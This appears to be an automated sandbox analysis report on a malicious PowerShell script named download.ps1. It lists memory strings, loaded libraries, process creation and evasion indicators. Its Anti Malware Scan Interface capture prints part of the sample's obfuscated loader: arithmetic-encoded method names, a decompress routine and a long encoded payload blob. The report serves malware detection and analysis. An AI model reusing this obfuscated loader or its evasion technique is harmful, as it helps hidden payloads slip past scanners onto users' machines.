Source: powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Width;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="npJG8sQuYYnHoX_tDI_L0g">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="npJG8sQuYYnHoX_tDI_L0g">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a20yz11x.2ge.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ezsadh724cyuq98.(([system.String]::new(@((4698-4631),(94+(-4977+(9514-(6894-2374)))),(-7336+7448),(1064800/8800),(-2056+2140),(-3844+(6916-2961))))))( $szl8g71o0ri2mnu ) $ezsadh724cyuq98.((-join (@((-2730+2797),(-7577+(-1895+(40935340/(23091292/5404)))),(88578/(1165878/1461)),(1669-1554),(956-855))| ForEach-Object { [char]$_ })))()$380do6izmun74vj.((-join (@((460893/(13262712/1928)),(9783-(11209-1534)),(5335-5224),(-5309+5424),(3807-3706))| ForEach-Object { [char]$_ })))()[byte[]] $ioy3gwv4625ncs7 = $szl8g71o0ri2mnu.((-join (@((5469-5385),(3005-(29455132/10178)),(-638+703),(714210/(716+(1863+3686))),(8405-8291),(1573-(-5430+(14372-(17597362/(3924405/(-7152+(1830+(6323235/905)))))))),(1494-(-2271+(5349392/1468))))| ForEach-Object { [char]$_ })))() $cwbzftra792duoj=$ioy3gwv4625ncs7 return $cwbzftra792duoj}[System.Text.Encoding]::ascii.(([system.String]::new(@((6543-(59781864/9237)),(7327-(73546228/(19139-8961))),(3346-(11198410/3467)),(41583/501),(-659+775),(-4892+5006),(710745/6769),(8704-(20144336/(1310296/(2176187/(27757090/(3694+(-2918+(16545-(81843921/8031))))))))),(7608-(5450+(18480615/(19190-(11913-1716)))))))))((vyqsxj5am76zg41binc9trw230h "J+JmMmMzbXc1ZZnq4+dz5RK1wjRxioQXCJ/whvmOo3A4ITZOSccMMZJ2Q3MQRZ1nAXshKG12J8XvWOsp7RIWJEYIH1db408BlzfF2FxnOJCifquuxwewTZvXg+q2+gnMQBmJ7KDcAqgNGk0I15C79/D0mukN2w4JQZyX/8wsMknLi9bdJ4YQQZjL8pBmjktLxYr9dSysMupum8Gc9rydVQSE4xhsgOKHsxJh3D9NnJKmmkJK7lOFaKg/CugvNpvLv0S74ppamSd3vrrH/D+55KQLjsCUqYLgBMNQAymdGGyYjJMv+1Ok5hyWUaFSr0FY/1UIPN62gK9q+Rnh1VGsIDDaCo3WttfsQkUlKCrkhQafoiguakOysLxXg+pbtjM9dGJx/dbCnBFO3qLogCAP91a+pxX2aVHrTSXVSoS1hkbXtWym2NqFg8StumXL1c9p7gbwbl8NkZY+Cedh9xcWRBbNhaFuyhpZJraRwND8c+iOXYYzUyXTHVLA+Di+VLiqOuZ9R6TGVSypDtBpgzZjAYlESNqU0Fg99NSJF9Col4ylstcs48WCfo1CDEbs2w2Pv6KEPR5a3WT6fY2ev7cJa5m/13Wqv3OvSp1Tu9r3SOFTWkBI944kgxBRjj1fLHuP4uhxvNKVX4ynp4TFkhXlAa96UoJozmI3MLHdgL8qmK9aeJVaTZbP9XOk89XzAYJM75SxEZeGfD1LxWIN27HnKWieVUx+Ww2cW8MbvrnBG7utqfbQzLdXhY4LNEcqpuENIbKGjBk8/kXp4Vc/W9lvzgZ4DqjvrREvB2KyvMYWz9zViWvsDY8LhPvffG2Q18Ji6rsphZuq0NBE0+KbUVpv/0nZCQKQwpmTVJ4mB+bqW8Gc2CpHX/aySpXRj53v5te7k6KJ1QQMEAXS+koMFXZh2ZpE6uxuuk2O1JWJ8SwEggjGibPxr0bQz53yqAXKFQiw8KTnLGFaBEquSBAVU8TijBKdqfyzGBzKW/HLpKLhpfan8/K34N+euzsKZ0kgb126ipyF/WxEQrjeGc+P2Y6Zn6sw19kSao9fI3FVw9cvVN05exAbuV8VgM62cF4CPoJmzAUqaOwf/gSbRuIvwB2iG9aRyVc7vZ8WN1mpoBg9ln6v2Ft9fmUuewkvUragN2BC/He5JqmHihSmfz8bq1IBMiZSfMrmfPJwlKXhDM+uoQxG+onpi9tpk8cq+raO3IKGnb00uAEaSfznWackq71tliXhvqKjvbQiuMsN1llC8Jvlm5DA0rkE00JJPNm3rZGhbrGNqjgVfs/0/YXjtXX3zNbkcvPO3s2SxurV7V6O0YTNoLtZh9bWT1dHkuh2ckvPw6SXj8jwjGplkvRiWmh87hf4SF7BIvoyRX8Wtv+7jp3Q+xLNpqJCEl+bIUWfGEK5Zt/N1deiSvEd0EfsRPTiMgmEd9BS/tbj2ATUSvk3eKBaIHTWs/yGW/sLtEL0WD+VYDOEtJ8XkAVdFrTveBtDOVoPkVygzphPrd+GpKUP8UmutwKJ1ZnJFfTMHJDv5kGptPZgtBNss4vupvsRXwZ+7qmChONpF23xyafJMP2STnIjIwSoMFxHF2Nh1qApeWZcPWXFs4R+oJ8VU2LPTQu4EkoWI2O9LAgj12d753FSCAQ4e3YjwG/iJCx+HeZtO70fmUsulAYHkxJ5X4EDrRRlzhV/Epl1VyZG1KGK7A8TYnR/52aKnKT3GyPgUJAYC9UHud5ebEIUhCpRuRUssHyY4YDCNIVfj+PqSgcBoIIo6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 16%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32a source: powershell.exe, 00000000.00000002.1561232440.000001E51ADD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1561232440.000001E51ADD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1602977901.000001E534EC2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E53522A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1602977901.000001E534EBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdbonic0L source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbA source: powershell.exe, 00000000.00000002.1607895988.000001E5352E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1602977901.000001E534EC2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32h source: powershell.exe, 00000000.00000002.1561232440.000001E51ADD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbd source: powershell.exe, 00000000.00000002.1604648751.000001E5351A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B26D2A5 pushad ; iretd 0_2_00007FFB4B26D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B3800BD pushad ; iretd 0_2_00007FFB4B3800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B384FAB push ecx; ret 0_2_00007FFB4B384FAC

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
